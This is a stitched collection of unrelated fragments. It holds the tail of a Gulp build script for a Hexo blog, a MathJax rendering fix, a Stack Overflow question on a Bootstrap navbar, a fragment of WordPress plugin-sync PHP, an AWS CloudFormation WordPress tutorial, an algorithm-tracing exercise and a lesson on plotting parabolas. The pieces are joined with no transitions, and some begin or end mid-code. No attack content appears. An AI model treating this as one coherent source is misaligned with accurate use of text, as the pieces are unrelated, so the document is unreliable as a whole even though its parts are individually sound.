    .pipe(gulpif(!isScriptAll, changed("./public")))
    .pipe(gulpif(isDebug, debug({ title: "Compress JS:" })))
    .pipe(plumber())
    .pipe(
      gulpBabel({
        presets: [es2015Preset] // ES5 output
      })
    )
    .pipe(uglify()) // call uglify() to compress the piped files
    .pipe(gulp.dest("./public")); // write to the output directory
});

// Minify the CSS files under the public directory
gulp.task("compressCss", function () {
  var option = {
    rebase: false,
    //advanced: true, // Boolean, default true: enable advanced optimizations (merging selectors, etc.)
    compatibility: "ie7" // keep IE7-and-below compatible syntax; String, default '' or '*' ('ie7' = IE7 mode, 'ie8' = IE8 mode, '*' = IE9+ mode)
    //keepBreaks: true, // Boolean, default false: keep line breaks
    //keepSpecialComments: '*' // keep all special comments; without this, vendor prefixes generated by autoprefixer may be stripped
  };
  return gulp
    .src(["./public/**/*.css", "!./public/**/*.min.css"]) // excluded CSS
    .pipe(gulpif(!isScriptAll, changed("./public")))
    .pipe(gulpif(isDebug, debug({ title: "Compress CSS:" })))
    .pipe(plumber())
    .pipe(cleancss(option))
    .pipe(gulp.dest("./public"));
});

// Minify the HTML files under the public directory
gulp.task("compressHtml", function () {
  var cleanOptions = {
    protect: /<\!--%fooTemplate\b.*?%-->/g, // skip processing
    unprotect: /<script [^>]*\btype="text\/x-handlebars-template"[\s\S]+?<\/script>/gi // special handling
  };
  var minOption = {
    collapseWhitespace: true, // collapse whitespace in the HTML
    collapseBooleanAttributes: true, // omit boolean attribute values: <input checked="true"/> ==> <input />
    removeEmptyAttributes: true, // remove attributes whose value is empty: <input id="" /> ==> <input />
    removeScriptTypeAttributes: true, // remove type="text/javascript" from <script>
    removeStyleLinkTypeAttributes: true, // remove type="text/css" from <style> and <link>
    removeComments: true, // strip HTML comments
    minifyJS: true, // minify inline JS
    minifyCSS: true, // minify inline CSS
    minifyURLs: true // minify URLs
  };
  return gulp
    .src("./public/**/*.html")
    .pipe(gulpif(isDebug, debug({ title: "Compress HTML:" })))
    .pipe(plumber())
    .pipe(htmlclean(cleanOptions))
    .pipe(htmlmin(minOption))
    .pipe(gulp.dest("./public"));
});

// Execution order: clean the public directory -> generate the raw blog content -> run minification -> deploy to the server
gulp.task(
  "default",
  gulp.series(
    "clean",
    "generate",
    "compressHtml",
    "compressCss",
    "compressJs",
    gulp.parallel("deploy")
  )
);
// The biggest change in Gulp 4 is that gulp.task now accepts only two arguments: the task name and the function that runs the task
Duplicate rendering of MathJax formulas
For this problem I looked through several tutorials, but none of them was quite right. Here is one, relatively complete, that I followed: "Thoroughly solving the problems with rendering MathJax math formulas in Hexo!!!"
First follow the tutorial above for the setup; it is basically all correct. After that you still need to delete one file.
Here is the procedure from the Zhihu answer (it was posted as a screenshot, which is not reproduced here).
The rendering problem is only fully solved after that file is deleted. The file name may or may not end with -plus; it makes no difference, and the version without -plus can be deleted just the same.
Drago - 10 months ago
CSS Question
Make content of navbar fit when the screen is between 768px and 992px
Whenever I resize my browser the content of the navbar gets pushed to a newline. This only happens between 768px and 992px. Is there a way that I can make the content of the navbar fit my screen?
This is what happens when the screen is between 768px and 992px:
http://image.prntscr.com/image/93ddcadd374d4af9928e3be209645ab3.png
HTML:
<nav class="navbar navbar-default navbar-fixed-top">
<div class="container">
<!-- Brand and toggle get grouped for better mobile display -->
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse"
data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
</button>
<a class="navbar-brand" href="/">Logo</a>
</div>
<!-- Collect the nav links, forms, and other content for toggling -->
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav">
<!-- <li class="active"><a href="#">Main <span class="sr-only">(current)</span></a></li> -->
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
aria-expanded="false">dropdown 1<span
class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="/news">1</a></li>
<li><a href="/staff"> 2</a></li>
<li><a href="/status">3</a></li>
<li><a href="/about">4</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
aria-expanded="false">dropdown 2<span
class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="https://kiwiirc.com/client/irc.lunarirc.net:+6697/?nick=lunar%7C?#LunarIRC" target="_blank">1</a></li>
<li><a href="irc://irc.lunarirc.net:6697"> 2</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
aria-expanded="false">dropdown 3<span
class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">1</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
aria-expanded="false">dropdown 4<span
class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">1</a></li>
<li><a href="#">2</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
aria-expanded="false">dropdown 5<span
class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">1</a></li>
<li><a href="#">2</a></li>
</ul>
</li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
aria-expanded="false">dropdown 6<span
class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">1</a></li>
<li><a href="#">2</a></li>
<li><a href="#">3</a></li>
</ul>
</li>
</ul>
</div><!-- /.navbar-collapse -->
</div><!-- /.container-fluid -->
</nav>
CSS:
body {
font-family: "Lato","Helvetica Neue",Helvetica,Arial,sans-serif;
font-size: 15px;
color: #2c3e50;
height: 100%;
}
html {
height: 100%;
}
@media screen and (max-width: 768px) {
.navbar {
position: relative;
min-height: 40px;
margin-bottom: 20px;
border: 1px solid transparent;
}
.navbar-default .navbar-nav .open .dropdown-menu > li > a {
color: #fff;
}
.navbar-default .navbar-nav .open .dropdown-menu > li > a:hover {
color: #18bc9c;
}
}
@media screen and (min-width: 768px) {
.dropdown:hover .dropdown-menu {
display: block;
}
.navbar {
position: relative;
min-height: 40px;
margin-bottom: 65px;
border: 1px solid transparent;
}
.panel {
border-radius: 6px;
}
}
.navbar-default .navbar-toggle:focus, .navbar-default .navbar-toggle:hover {
background-color: #1a242f;
-webkit-transform: rotate(360deg);
-moz-transition: rotate(360deg);
transform: rotate(360deg);
}
.navbar-brand {
font-size: 25px;
padding-right: 30px;
}
a {
text-decoration: underline;
}
.nav>li>a {
padding-right: 25px;
text-decoration: none;
}
.navbar-default .navbar-brand {
color: #fff;
text-decoration: none;
}
.dropdown-menu>li>a {
text-decoration: none;
}
.navbar-default .navbar-nav>li>a {
color: #fff;
}
.navbar-default {
background-color: #2c3e50;
}
.navbar-default .navbar-brand:focus, .navbar-default .navbar-brand:hover {
color: #18bc9c;
}
.navbar-default .navbar-nav>li>a:hover, .navbar-default .navbar-nav>li>a:focus {
color: #18bc9c;
}
.navbar-default .navbar-nav>.open>a, .navbar-default .navbar-nav>.open>a:hover, .navbar-default .navbar-nav>.open>a:focus {
color: #fff;
background-color: #1a242f;
}
.navbar-default .navbar-nav>.active>a, .navbar-default .navbar-nav>.active>a:focus, .navbar-default .navbar-nav>.active>a:hover {
color: white;
background-color: #1a242f;
}
.navbar-fixed-bottom .navbar-collapse, .navbar-fixed-top .navbar-collapse {
max-height: 400px;
}
.navbar-fixed-bottom .navbar-collapse, .navbar-fixed-top .navbar-collapse {
max-height: 400px;
}
Try it out at: http://codepen.io/anon/pen/LbEOya
Answer
You can also remove the padding from the other elements evenly.
Code pen : http://codepen.io/saa93/pen/vyEWaO
Code:
@media only screen and (min-width:768px) and (max-width: 992px) {
.navbar .container{
width:100%;
}
.nav.navbar-nav > li > a {
padding-right: 8px;
}
a.navbar-brand{
padding-right:20px;
}
}
sync();
}

/**
 * Process all sync actions.
 */
function sync() {
	$this->sync_downloads();
	$this->sync_ratings();
	$this->update_tested_up_to();
}

/**
 * Sync any changed download counts to plugin meta.
 */
function sync_downloads() {
	global $wpdb;

	$download_count_table = PLUGINS_TABLE_PREFIX . 'download_counts';

	$changed_download_counts = $wpdb->get_results(
		"SELECT p.id as post_id, downloads
		FROM `{$wpdb->posts}` p
		JOIN `{$download_count_table}` c on p.post_name = c.plugin_slug
		LEFT JOIN `{$wpdb->postmeta}` pm ON p.id = pm.post_id AND pm.meta_key = 'downloads'
		WHERE downloads != pm.meta_value OR pm.meta_id IS NULL"
	);

	foreach ( $changed_download_counts as $row ) {
		update_post_meta( $row->post_id, 'downloads', $row->downloads );
	}
}

/**
 * Sync new/updated ratings to postmeta.
 */
function sync_ratings() {
	global $wpdb;

	if ( ! class_exists( '\WPORG_Ratings' ) ) {
		return;
	}

	// Sync new (and updated) ratings to postmeta
	$last_review_time    = get_option( 'plugin_last_review_sync' );
	$current_review_time = $wpdb->get_var( 'SELECT MAX(`date`) FROM `ratings`' );
	if ( strtotime( $last_review_time ) >= strtotime( $current_review_time ) ) {
		return;
	}

	// Get the plugin slugs for whom extra reviews have been made, or ratings changed.
	$slugs = $wpdb->get_col( $wpdb->prepare(
		"SELECT distinct object_slug FROM `ratings` WHERE object_type = 'plugin' AND `date` >= %s AND `date` < %s",
		$last_review_time,
		$current_review_time
	) );

	foreach ( $slugs as $plugin_slug ) {
		$post = Plugin_Directory::get_plugin_post( $plugin_slug );
		if ( ! $post ) {
			continue;
		}

		update_post_meta( $post->ID, 'rating', \WPORG_Ratings::get_avg_rating( 'plugin', $post->post_name ) );
		update_post_meta( $post->ID, 'ratings', \WPORG_Ratings::get_rating_counts( 'plugin', $post->post_name ) );
	}

	update_option( 'plugin_last_review_sync', $current_review_time, 'no' );
}

/**
 * After WordPress is released, update the 'tested' meta keys to the latest version as
 * specified by `wporg_get_version_equivalents()`.
 */
function update_tested_up_to() {
	global $wpdb;

	if ( ! function_exists( 'wporg_get_version_equivalents' ) ) {
		return;
	}

	$equivs     = wporg_get_version_equivalents();
	$equivs_key = md5( serialize( $equivs ) );
	if ( $equivs_key === get_option( 'plugin_last_tested_sync' ) ) {
		return;
	}

	$latest_equiv = array();
	foreach ( $equivs as $latest_compatible_version => $compatible_with ) {
		foreach ( $compatible_with as $version ) {
			$latest_equiv[ $version ] = $latest_compatible_version;
		}
	}

	$tested_meta_value_esc_sql = '"' . implode( '", "', array_map( 'esc_sql', array_keys( $latest_equiv ) ) ) . '"';

	$tested_values = $wpdb->get_results(
		"SELECT post_id, meta_value FROM {$wpdb->postmeta} WHERE meta_key = 'tested' AND meta_value IN( {$tested_meta_value_esc_sql} )"
	);
	foreach ( $tested_values as $row ) {
		update_post_meta( $row->post_id, 'tested', $latest_equiv[ $row->meta_value ] );
	}

	update_option( 'plugin_last_tested_sync', $equivs_key );
}
}
AWS CloudFormation
User Guide (API Version 2010-05-15)
Get Started
With the right template, you can deploy all the AWS resources you need for an application at once. In this section, you'll examine a template that declares the resources for a WordPress blog, create a WordPress blog as a stack, monitor the stack creation process, examine the resources on the stack, and then delete the stack. You use the AWS Management Console to complete these tasks.
Step 1: Sign up for the Service
Signing up for AWS CloudFormation also automatically signs you up for other AWS products you need, such as Amazon Elastic Compute Cloud, Amazon Relational Database Service and Amazon Simple Notification Service. You're not charged for any services unless you use them.
Note
AWS CloudFormation is a free service; however, you are charged for the AWS resources you include in your stacks at the current rates for each. For more information about AWS pricing, go to the detail page for each product on http://aws.amazon.com.
To sign up for AWS CloudFormation
1. Go to http://aws.amazon.com/cloudformation, and then click Sign Up for AWS CloudFormation.
2. Follow the on-screen instructions.
If you don't already have an AWS account, you'll be prompted to create one when you sign up for AWS CloudFormation.
Part of the sign-up procedure involves receiving a phone call and entering a PIN using the phone keypad.
Step 2: Pick a template
Next, you'll need a template that specifies the resources that you want in your stack. For this step, you use a sample template that is already prepared. The sample template creates a basic WordPress blog that uses a single Amazon EC2 instance and an Amazon RDS DB Instance. The template also creates an Amazon EC2 and Amazon RDS security group to control firewall settings for the Amazon EC2 instance and the database instance.
Important
AWS CloudFormation is free, but the AWS resources that AWS CloudFormation creates are live (and not running in a sandbox). You will incur the standard usage fees for these resources until you terminate them in the last task in this tutorial. The total charges will be minimal. For information about how you might minimize any charges, go to http://aws.amazon.com/free/.
To view the template
A template is a JavaScript Object Notation (JSON) text file that contains the configuration information about the AWS resources you want to create in the stack. In this particular sample template, it includes six top-level sections: AWSTemplateFormatVersion, Description, Parameters, Mappings, Resources, and Outputs; however, only the Resources section is required.
The Resources section contains the definitions of the AWS resources you want to create with the template. Each resource is listed separately and specifies the properties that are necessary for creating that particular resource. The following resource declaration is the configuration for the Amazon RDS database instance, which in this example has the logical name DBInstance:
"Resources" : {
...
"DBInstance" : {
"Type": "AWS::RDS::DBInstance",
"Properties": {
"DBName" : { "Ref" : "DBName" },
"Engine" : "MySQL",
"MasterUsername" : { "Ref" : "DBUsername" },
"DBInstanceClass" : { "Ref" : "DBClass" },
"DBSecurityGroups" : [{ "Ref" : "DBSecurityGroup" }],
"AllocatedStorage" : { "Ref" : "DBAllocatedStorage" },
"MasterUserPassword": { "Ref" : "DBPassword" }
}
},
"DBSecurityGroup": {
"Type": "AWS::RDS::DBSecurityGroup",
"Properties": {
"DBSecurityGroupIngress": { "EC2SecurityGroupName": { "Ref": "WebServerSecurityGroup"} },
"GroupDescription" : "Frontend Access"
}
},
...
},
If you have created database instances before, you can recognize properties, such as Engine, DBInstanceClass, and AllocatedStorage, that determine the configuration of the database instance. Resource declarations are an efficient way to specify all these configuration settings at once. When you put resource declarations in a template, you can create and configure all the declared resources easily by using the template to create a stack. To launch the same configuration of resources, all you have to do is create a new stack that uses the same template.
The resource declaration begins with a string that specifies the logical name for the resource. As you'll see, the logical name can be used to refer to resources within the template.
You use the Parameters section to declare values that can be passed to the template when you create the stack. A parameter is an effective way to specify sensitive information, such as user names and passwords, that you don't want to store in the template itself. It is also a way to specify information that might be unique to the specific application or configuration you are deploying, for example, a domain name or instance type. When you create the WordPress stack later in this section, you'll see the set of parameters declared in the template appear on the Specify Parameters page of the Create Stack wizard, where you can specify the parameters before you create the stack.
The following parameters are used in the template to specify values that are used in properties of the Amazon RDS database instance resource:
"Parameters" : {
...
"DBName" : {
"Default": "wordpress",
"Description" : "The WordPress database name",
"Type": "String",
"MinLength": "1",
"MaxLength": "64",
"AllowedPattern" : "[a-zA-Z][a-zA-Z0-9]*",
"ConstraintDescription" : "must begin with a letter and contain only alphanumeric characters."
},
"DBUsername" : {
"Default": "admin",
"NoEcho": "true",
"Description" : "The WordPress database admin account user name",
"Type": "String",
"MinLength": "1",
"MaxLength": "16",
"AllowedPattern" : "[a-zA-Z][a-zA-Z0-9]*",
"ConstraintDescription" : "must begin with a letter and contain only alphanumeric characters."
},
"DBPassword" : {
"Default": "admin",
"NoEcho": "true",
"Description" : "The WordPress database admin account password",
"Type": "String",
"MinLength": "1",
"MaxLength": "41",
"AllowedPattern" : "[a-zA-Z0-9]*",
"ConstraintDescription" : "must contain only alphanumeric characters."
},
"DBAllocatedStorage" : {
"Default": "5",
"Description" : "The size of the database (Gb)",
"Type": "Number",
"MinValue": "5",
"MaxValue": "1024",
"ConstraintDescription" : "must be between 5 and 1024Gb."
},
...
},
In the DBInstance resource declaration, you see the DBName property specified with the DBName parameter:
"DBInstance" : {
"Type": "AWS::RDS::DBInstance",
"Properties": {
"DBName" : { "Ref" : "DBName" },
...
}
},
The braces contain a call to the Ref function with DBName as its input. The Ref function returns the value of the object it refers to. In this case, the Ref function sets the DBName property to the value that was specified for DBName when the stack was created.
The Ref function can also set a resource's property to the value of another resource. For example, the resource declaration DBInstance contains the following property declaration:
"DBInstance" : {
"Type": "AWS::RDS::DBInstance",
"Properties": {
...
"DBSecurityGroups" : [{ "Ref" : "DBSecurityGroup" }],
...
}
},
The DBSecurityGroups property takes a list of Amazon RDS database security groups. The Ref function has an input of DBSecurityGroup, which is the logical name of a database security group in the template, and adds the name of DBSecurityGroup to the DBSecurityGroups property.
In the template, you'll also find a Mappings section. You use mappings to declare conditional values that are evaluated in a similar manner as a lookup table statement. The template uses mappings to select the correct Amazon machine image (AMI) for the region and the architecture type for the instance type. Outputs define custom values that are returned by the aws cloudformation describe-stacks command and in the AWS CloudFormation console Outputs tab after the stack is created. You can use output values to return information from the resources in the stack, such as the URL for a website that was created in the template. We cover mappings, outputs, and other things about templates in more detail in Learn Template Basics.
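For orientation, an Outputs declaration in this style of template usually looks like the following sketch. The resource name (WebServer) and the attribute it reads are illustrative here rather than quoted from the sample template:

"Outputs" : {
  "WebsiteURL" : {
    "Description" : "URL of the WordPress website",
    "Value" : { "Fn::Join" : ["", ["http://", { "Fn::GetAtt" : [ "WebServer", "PublicDnsName" ] }]] }
  }
}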
That's enough about templates for now. Let's start creating a stack.
Step 3: Make sure you have prepared any required items for the stack
Before you create a stack from a template, you must ensure that all dependent resources that the template requires are available. A template can use or refer to both existing AWS resources and resources declared in the template itself. AWS CloudFormation takes care of checking references to resources in the template and also checks references to existing resources to ensure that they exist in the region where you are creating the stack. If your template refers to a dependent resource that does not exist, stack creation fails.
The example WordPress template contains an input parameter, KeyName, that specifies the key pair used for the Amazon EC2 instance that is declared in the template. The template depends on the user who creates a stack from the template to supply a valid Amazon EC2 key pair for the KeyName parameter. If you supply a valid key pair name, the stack creates successfully. If you don't supply a valid key pair name, the stack is rolled back.
Make sure you have a valid Amazon EC2 key pair and record the key pair name before you create the stack.
To see your key pairs, open the Amazon EC2 console, then click Key Pairs in the navigation pane.
Note
If you don't have an Amazon EC2 key pair, you must create the key pair in the same region where you are creating the stack. For information about creating a key pair, see Getting an SSH Key Pair in the Amazon Elastic Compute Cloud User Guide.
Now that you have a valid key pair, let's use the WordPress template to create a stack.
Step 4: Create the stack
You will create your stack based on the WordPress-1.0.0 file discussed earlier. The template contains several AWS resources including an Amazon RDS database instance and an Amazon EC2 instance.
To create the WordPress stack
1. Sign in to the AWS Management Console and open the AWS CloudFormation console at https://console.aws.amazon.com/cloudformation/.
2. If this is a new AWS CloudFormation account, click Create New Stack. Otherwise, click Create Stack.
3. In the Stack Name field, type a stack name. For this example, use MyWPTestStack. The stack name cannot contain spaces.
4. Select Provide an S3 URL to template to type or paste the URL for the sample WordPress template, and then click Continue:
https://s3.amazonaws.com/cloudformation-templates-us-east-1/WordPress_Single_Instance_With_RDS.template
Note
AWS CloudFormation templates that are stored in an Amazon S3 bucket must be accessible to the user who is creating the stack, and must exist in the same region as the stack being created. Therefore, if the Amazon S3 bucket exists in the us-east-1 region, the stack must also be created in us-east-1.
5. In the KeyName field, enter the name of a valid Amazon EC2 key pair in the same region you are creating the stack.
Note
On the Specify Parameters page, you'll recognize the parameters from the Parameters section of the template.
6. Click Next Step.
7. In this scenario, we won't add any tags. Click Next. Tags, which are key-value pairs, can help you identify your stacks. For more information, see Adding Tags to Your AWS CloudFormation Stack.
8. Review the information for the stack. When you're satisfied with the settings, click Create.
Your stack might take several minutes to create—but you probably don't want to just sit around waiting. If you're like us, you'll want to know how the stack creation is going.
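If you prefer the command line, the same stack can be created with the AWS CLI; the command below mirrors the console steps (the key pair name mykey is a placeholder for your own):

aws cloudformation create-stack \
  --stack-name MyWPTestStack \
  --template-url https://s3.amazonaws.com/cloudformation-templates-us-east-1/WordPress_Single_Instance_With_RDS.template \
  --parameters ParameterKey=KeyName,ParameterValue=mykey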
Step 5: Monitor the progress of stack creation
After you complete the Create Stack wizard, AWS CloudFormation begins creating the resources that are specified in the template. Your new stack, MyWPTestStack, appears in the list at the top portion of the CloudFormation console. Its status should be CREATE_IN_PROGRESS. You can see detailed status for a stack by viewing its events.
To view the events for the stack
1. On the AWS CloudFormation console, select the stack MyWPTestStack in the list.
2. In the stack details pane, click the Events tab.
The console automatically refreshes the event list with the most recent events every 60 seconds.
The Events tab displays each major step in the creation of the stack sorted by the time of each event, with latest events on top.
The first event (at the bottom of the event list) is the start of the stack creation process:
2013-04-24 18:54 UTC-7 CREATE_IN_PROGRESS AWS::CloudFormation::Stack MyWPTestStack User initiated
Next are events that mark the beginning and completion of the creation of each resource. For example, creation of the DBSecurityGroup security group results in the following entries:
2013-04-24 18:59 UTC-7 CREATE_COMPLETE AWS::RDS::DBSecurityGroup...
2013-04-24 18:54 UTC-7 CREATE_IN_PROGRESS AWS::RDS::DBSecurityGroup...
The CREATE_IN_PROGRESS event is logged when AWS CloudFormation reports that it has begun to create the resource. The CREATE_COMPLETE event is logged when the resource is successfully created.
When AWS CloudFormation has successfully created the stack, you will see the following event at the top of the Events tab:
2013-04-24 19:17 UTC-7 CREATE_COMPLETE AWS::CloudFormation::Stack MyWPTestStack
If AWS CloudFormation cannot create a resource, it reports a CREATE_FAILED event and, by default, rolls back the stack and deletes any resources that have been created. The Reason column displays the issue that caused the failure. For example, if you specified an invalid database password, you might see something like the following event for the AWS::RDS::DBInstance resource:
2013-04-24 19:21 UTC-7 CREATE_FAILED AWS::RDS::DBInstance DBInstance The parameter MasterUserPassword is not a valid password because it is shorter than 8 characters.
Step 6: Use your stack resources
When the stack MyWPTestStack has a status of CREATE_COMPLETE, AWS CloudFormation has finished creating the stack, and you can start using its resources.
The sample WordPress stack creates a WordPress website. You can continue with the WordPress setup by running the WordPress installation script.
To complete the WordPress installation
1. On the Outputs tab, in the WebsiteURL row, click the link in the Value column.
The WebsiteURL output value is the URL of the installation script for the WordPress website that you created with the stack.
2. On the web page for the WordPress installation, follow the on-screen instructions to complete the WordPress installation. For more information about installing WordPress, see http://codex.wordpress.org/Installing_WordPress.
After you complete the installation and log in, you are directed to the dashboard, where you can set additional options for your WordPress blog. Then you can start writing posts for the blog that you successfully created by using an AWS CloudFormation template.
Step 7: Clean Up
You have completed the AWS CloudFormation getting started tasks. To make sure you are not charged for any unwanted services, you can clean up by deleting the stack and its resources.
To delete the stack and its resources
1. From the AWS CloudFormation console, select the MyWPTestStack stack.
2. Click Delete Stack.
3. In the confirmation message that appears, click Yes, Delete.
The status for MyWPTestStack changes to DELETE_IN_PROGRESS. In the same way you monitored the creation of the stack, you can monitor its deletion by using the Events tab. When AWS CloudFormation completes the deletion of the stack, it removes the stack from the list.
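Deletion can likewise be scripted. A short boto3 sketch; the waiter blocks until the delete finishes and raises WaiterError on failure or timeout:

import boto3

cfn = boto3.client("cloudformation", region_name="us-east-1")
cfn.delete_stack(StackName="MyWPTestStack")

# Wait for DELETE_COMPLETE; raises WaiterError on failure or timeout.
cfn.get_waiter("stack_delete_complete").wait(StackName="MyWPTestStack")
print("MyWPTestStack deleted")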
Congratulations! You successfully picked a template, created a stack, viewed and used its resources, and deleted the stack and its resources. Not only that, you were able to set up a WordPress blog using an AWS CloudFormation template. You can find other templates in the AWS CloudFormation Sample Template Library.
Now it's time to learn more about templates so that you can easily modify existing templates or create your own: Learn Template Basics.
In this program, the sign ":=" denotes the assignment operator, and the signs "+", "−", "*" and "/" denote addition, subtraction, multiplication and division, respectively. The rules for performing the operations and the order of evaluation follow ordinary arithmetic.
Determine the value of the variable a after the algorithm executes:
a := 8
b := 3
b := a / 2 * b
a := 3 * a + 2 * b
Solution
This is a simple computational problem that only requires a little attention. Let's work through it line by line.
The first line stores the number 8 in the variable a.
The second line stores the number 3 in the variable b.
The third line gives b a new value. Let's compute it:
b := a / 2 * b = 8 / 2 * 3 = 4 * 3 = 12
Now the variable b holds 12 instead of 3.
The fourth line overwrites the value of a. Substituting the current values of a and b, we get:
a := 3 * 8 + 2 * 12 = 24 + 24 = 48
Answer: 48
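A quick way to double-check a trace like this is simply to run it. A direct transcription into Python (note that Python's / is float division, so it prints 48.0):

a = 8
b = 3
b = a / 2 * b      # 8 / 2 * 3 = 4 * 3 = 12
a = 3 * a + 2 * b  # 3 * 8 + 2 * 12 = 24 + 24 = 48
print(a)           # 48.0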
The Quadratic Function and the Parabola
Before moving on to the quadratic function, we recommend recalling what a function is in mathematics.
Once you have a firm grasp of the general facts about functions (ways of defining them, the notion of a graph), studying other kinds of functions will come much more easily.
What is a quadratic function
Remember!
A quadratic function is a function of the form
y = ax² + bx + c,
where a, b and c are given numbers.
In other words: if the highest power in which x appears in the function is 2, then you are looking at a quadratic function.
Let's consider some examples of quadratic functions and determine the coefficients a, b and c in each.
Quadratic function and its coefficients:
y = 2x² − 7x + 9
• a = 2
• b = −7
• c = 9
y = 3x² − 1
• a = 3
• b = 0
• c = −1
y = −3x² + 2x
• a = −3
• b = 2
• c = 0
How to plot the graph of a quadratic function
Remember!
The graph of a quadratic function is called a parabola.
A parabola looks like this:
[Figure: a parabola — the graph of a quadratic function]
A parabola can also open downward:
[Figure: an inverted (downward-opening) parabola]
There is a clear algorithm for plotting the graph of a quadratic function. We recommend always following this order of steps when constructing a parabola; it will help you avoid mistakes.
To make the algorithm easier to follow, let's work through it on an example right away.
Let's plot the graph of the quadratic function y = x² − 7x + 10.
1. Direction of the parabola's branches
Remember!
If a > 0, the branches point upward.
If a < 0, the branches point downward.
In our function a = 1, which means the branches of the parabola point upward.
2. Coordinates of the parabola's vertex
Remember!
To find x0 (the vertex coordinate along the Ox axis), use the formula:
x0 = −b / (2a)
Let's find x0 for our function y = x² − 7x + 10:
x0 = −(−7) / (2 · 1) = 7 / 2 = 3.5
Now we need to find y0 (the vertex coordinate along the Oy axis). To do this, substitute the value of x0 into the original function. You can review how to evaluate a function in the lesson "How to solve problems on functions", in the subsection "How to get the value of a function".
y0(3.5) = 3.5² − 7 · 3.5 + 10 = 12.25 − 24.5 + 10 = −12.25 + 10 = −2.25
Let's write down the coordinates of the vertex:
(·) A (3.5; −2.25) — the vertex of the parabola.
Mark the vertex on the coordinate system and draw the axis of symmetry through it: a parabola is symmetric about the vertical line passing through its vertex.
[Figure: the vertex of the parabola]
3. Zeros of the function
First, let's clarify what the zeros of a function are.
Remember!
The zeros of a function are the points where the graph of the function crosses the Ox axis (the axis of abscissas).
On a graph, the zeros of a function look like this:
[Figure: zeros of a function]
The zeros of a function get their name from the fact that at these points the coordinate along the Oy axis equals zero.
Now let's see how to compute the coordinates of the zeros before plotting the graph.
Remember!
To find the coordinates of the zeros of a function, substitute y = 0 into the original function.
Substitute y = 0 into the given function y = x² − 7x + 10 and solve the resulting quadratic equation for x:
0 = x² − 7x + 10
x² − 7x + 10 = 0
x1;2 = (7 ± √(49 − 4 · 1 · 10)) / (2 · 1)
x1;2 = (7 ± √9) / 2
x1;2 = (7 ± 3) / 2
x1 = (7 + 3) / 2 = 10 / 2 = 5
x2 = (7 − 3) / 2 = 4 / 2 = 2
The equation has two roots, which means the graph has two points of intersection with the Ox axis. Let's name these points and write down their coordinates:
• (·) B (5; 0)
• (·) C (2; 0)
Mark the obtained points (the zeros of the function) on the coordinate system.
[Figure: the zeros of the function marked on the coordinate system]
4. Additional points for plotting the graph
Take four arbitrary values of x. It is sensible to pick integer values on the Ox axis that are closest to the axis of symmetry. Write the numbers in the table in increasing order.
x:  1   3   4   6
y:
For each chosen value of x, compute y:
• y(1) = 1² − 7 · 1 + 10 = 1 − 7 + 10 = 4
• y(3) = 3² − 7 · 3 + 10 = 9 − 21 + 10 = −2
• y(4) = 4² − 7 · 4 + 10 = 16 − 28 + 10 = −2
• y(6) = 6² − 7 · 6 + 10 = 36 − 42 + 10 = 4
Write the results into the table:
x:  1   3   4   6
y:  4  −2  −2   4
Mark the obtained points of the graph on the coordinate system (the green points).
[Figure: additional points for plotting]
Now we are ready to draw the graph. Don't forget to label the graph of the function once it is drawn.
[Figure: the graph of the parabola y = x² − 7x + 10]
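Every step of this algorithm can be checked mechanically. Here is a small illustrative Python sketch (not part of the original lesson) that computes the vertex, the zeros and the extra points for y = x² − 7x + 10:

import math

a, b, c = 1, -7, 10
f = lambda x: a * x**2 + b * x + c

x0 = -b / (2 * a)                 # vertex: x0 = -b / (2a)
print("vertex:", (x0, f(x0)))     # (3.5, -2.25)

d = b**2 - 4 * a * c              # discriminant
if d >= 0:
    r1 = (-b - math.sqrt(d)) / (2 * a)
    r2 = (-b + math.sqrt(d)) / (2 * a)
    print("zeros:", sorted((r1, r2)))   # [2.0, 5.0]
else:
    print("no real roots")

for x in (1, 3, 4, 6):            # the extra points from the table
    print(x, f(x))                # 4, -2, -2, 4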
A short example of constructing a parabola
Let's consider another example of plotting the graph of a quadratic function, this time writing the algorithm briefly, without the details.
Suppose we need to plot the graph of the function y = −3x² − 6x − 4.
1. Direction of the parabola's branches
Since a = −3, the branches of the parabola point downward.
2. Coordinates of the parabola's vertex
x0 = −b / (2a) = −(−6) / (2 · (−3)) = 6 / (−6) = −1
y0(−1) = −3 · (−1)² − 6 · (−1) − 4 = −3 · 1 + 6 − 4 = −1
(·) A (−1; −1) — the vertex of the parabola.
[Figure: the vertex of the parabola y = −3x² − 6x − 4]
3. Zeros of the function
Points of intersection with the Ox axis (y = 0):
0 = −3x² − 6x − 4
−3x² − 6x − 4 = 0 | · (−1)
3x² + 6x + 4 = 0
x1;2 = (−6 ± √(6² − 4 · 3 · 4)) / (2 · 3)
x1;2 = (−6 ± √(36 − 48)) / 6
x1;2 = (−6 ± √(−12)) / 6
Answer: there are no real roots.
Since there are no roots, the graph of the function does not cross the Ox axis.
4. Auxiliary points for x = −3, x = −2, x = 0, x = 1. Substitute them into the original function y = −3x² − 6x − 4:
• y(−3) = −3 · (−3)² − 6 · (−3) − 4 = −27 + 18 − 4 = −13
• y(−2) = −3 · (−2)² − 6 · (−2) − 4 = −12 + 12 − 4 = −4
• y(0) = −3 · 0² − 6 · 0 − 4 = −4
• y(1) = −3 · 1² − 6 · 1 − 4 = −3 − 6 − 4 = −13
x:  −3   −2    0    1
y: −13   −4   −4  −13
